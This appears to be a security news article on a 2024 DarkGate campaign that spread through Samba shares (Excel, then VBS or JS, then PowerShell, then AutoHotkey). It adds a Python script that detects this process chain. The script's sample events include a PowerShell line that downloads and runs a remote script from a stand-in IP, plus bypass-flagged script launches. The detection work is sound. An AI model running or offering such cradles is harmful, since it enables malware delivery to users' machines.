Cybersecurity researchers have exposed a brief DarkGate malware campaign that abused Samba file shares to initiate infections.
According to Palo Alto Networks Unit 42, the activity occurred in March and April 2024 and used public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. The campaign targeted North America, Europe, and parts of Asia.
“This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware,” security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan stated.
DarkGate, first detected in 2018, has evolved into a malware-as-a-service (MaaS) offering, accessible to a select group of customers. It includes features for remote control of compromised hosts, code execution, cryptocurrency mining, launching reverse shells, and deploying additional payloads.
Attacks involving DarkGate have increased significantly following the multinational law enforcement takedown of the QakBot infrastructure in August 2023.
The campaign documented by Unit 42 began with Microsoft Excel (.xlsx) files that, when opened, prompt targets to click an embedded Open button, which then fetches and executes VBS code hosted on a Samba file share.
The VBS script retrieves and runs a PowerShell script, which in turn downloads an AutoHotkey-based DarkGate package.
Alternate infection sequences that used JavaScript files instead of VBS followed the same pattern, likewise downloading and executing the follow-up PowerShell script.
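The delivery chain described above (Office document, then a script host loading VBS or JavaScript from a UNC share, then PowerShell, then AutoHotkey) leaves a distinctive parent-child process tree. The following script is an added example, not Unit 42's or DarkGate's code, that hunts for that tree in process-creation telemetry. The event records are constructed for this example and their field names (pid, ppid, image, cmdline) are assumptions loosely modelled on Sysmon Event ID 1; the share host 203.0.113.5 and all paths are likewise made up. It generalizes slightly beyond the article by also accepting Word and PowerPoint as the parent, and it reports partial chains so a blocked later stage still surfaces.

```python
import re
from collections import defaultdict

# Parent applications worth watching (the article describes Excel; Word and
# PowerPoint are added here as a generalization).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# UNC path to a VBS/JS-family script: \\host\share\...\name.vbs
UNC_SCRIPT = re.compile(r'\\\\([\w.-]+)\\[^\s"]+?\.(?:vbs|vbe|js|jse)\b', re.IGNORECASE)

# Constructed sample events (hypothetical, not real telemetry).
SAMPLE_EVENTS = [
    # Malicious chain 1: Excel -> wscript (VBS from SMB share) -> PowerShell -> AutoHotkey
    {"pid": 1000, "ppid": 500, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" "C:\Users\alice\Downloads\invoice.xlsx"'},
    {"pid": 1001, "ppid": 1000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\203.0.113.5\share\a.vbs"},
    {"pid": 1002, "ppid": 1001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ep bypass -c "iex (iwr http://203.0.113.5/b.ps1)"'},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Users\alice\AppData\Local\Temp\AutoHotkey.exe",
     "cmdline": r"AutoHotkey.exe C:\Users\alice\AppData\Local\Temp\script.ahk"},
    # Benign: an admin running a script from an internal share out of Explorer
    {"pid": 3000, "ppid": 600, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3001, "ppid": 3000, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe \\fileserver\it\inventory.vbs"},
    # Malicious chain 2: the JavaScript variant, with the AutoHotkey stage never observed
    {"pid": 4000, "ppid": 500, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" "C:\Users\bob\Downloads\statement.xlsx"'},
    {"pid": 4001, "ppid": 4000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\203.0.113.5\share\c.js"},
    {"pid": 4002, "ppid": 4001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -f C:\Users\bob\AppData\Local\Temp\d.ps1"},
]


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def unc_script_host(cmdline):
    """Return the UNC host if the command line loads a script from a share, else None."""
    m = UNC_SCRIPT.search(cmdline)
    return m.group(1) if m else None


def find_chains(events):
    """Flag script hosts spawned by Office that run a script from a UNC share,
    then walk their descendants to see how far the DarkGate-style chain got."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    def descendants(pid):
        stack = list(children[pid])
        while stack:
            e = stack.pop()
            yield e
            stack.extend(children[e["pid"]])

    findings = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        host = unc_script_host(e["cmdline"])
        if host is None:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in OFFICE_APPS:
            continue  # script from a share, but not launched by Office: not this chain
        stages = ["office", "script_host_unc"]
        desc = list(descendants(e["pid"]))
        if any(basename(d["image"]) in POWERSHELL for d in desc):
            stages.append("powershell")
        if any("autohotkey" in basename(d["image"]) for d in desc):
            stages.append("autohotkey")
        findings.append({"root_pid": parent["pid"], "script_pid": e["pid"],
                         "share_host": host, "stages": stages})
    return findings


if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f)
```

The first gate (Office parent plus script host plus UNC path) is what makes this usable on real telemetry: scripts run from internal shares are common, but Excel spawning wscript.exe against a share is not, and the later stages only raise the severity of a hit rather than deciding it.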
Once running, DarkGate checks for a range of anti-malware products and inspects CPU information to determine whether it is on a physical host or inside a virtual machine, which helps it evade analysis. It also enumerates running processes looking for reverse-engineering tools, debuggers, and virtualization software.
“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers explained.
“As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses.”